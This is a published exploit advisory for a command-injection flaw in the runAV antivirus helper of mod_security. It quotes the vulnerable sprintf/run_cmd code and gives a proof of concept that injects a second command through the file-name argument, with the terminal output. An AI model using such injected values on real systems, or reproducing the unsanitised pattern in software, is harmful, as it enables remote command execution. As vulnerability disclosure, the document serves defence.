runAV mod_security - Arbitrary Command Execution

# Title : runAV mod_security Remote Command Execution
# Date : 13/05/2016
# Author : R-73eN
# Tested on : mod_security with runAV Linux 4.2.0-30-generic #36-Ubuntu SMP Fri Feb 26 00:57:19 UTC 2016 i686 i686 i686 GNU/Linux
# Software : https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/util/av-scanning/runAV
# Vendor : https://www.modsecurity.org/
#  ___        __        ____                 _    _  
# |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    
#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
# |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|
#
#
 
 
 
#include "common.h"
 
main(int argc, char *argv[])
{
    char cmd[MAX_OUTPUT_SIZE];
    char output[MAX_OUTPUT_SIZE];
    int error;
    char *colon;
    char *keyword;
 
    if (argc > 1) {
        sprintf (cmd, "/usr/bin/clamscan --no-summary %s", argv[1]);
        output[0] = '\0';
        error = run_cmd(cmd,output,MAX_OUTPUT_SIZE);
 
+++++++++++++++++ OTHER CODE +++++++++++++++++++++++++++++++++
 
 
The argv[1] parameter is passed unsanitized to a sprintf function which sends the formatted output to the cmd variable,
which is later passed as a parameter to a run_cmd function on line 14.
https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/util/av-scanning/runAV/runAV.c#L14
 
POC:
 
[email protected]:/usr/share/modsecurity-crs/util/av-scanning/runAV$ ./runAV "foo.php;touch /tmp/pwn3d"
sh: 1: /usr/bin/clamscan: not found
1 exec empty: OK
[email protected]:/usr/share/modsecurity-crs/util/av-scanning/runAV$ ls -la /tmp/ | grep pwn3d
-rw-rw-r--  1 snort snort    0 Maj 13 16:45 pwn3d
[email protected]:/usr/share/modsecurity-crs/util/av-scanning/runAV$

#  0day.today [2018-03-01]  #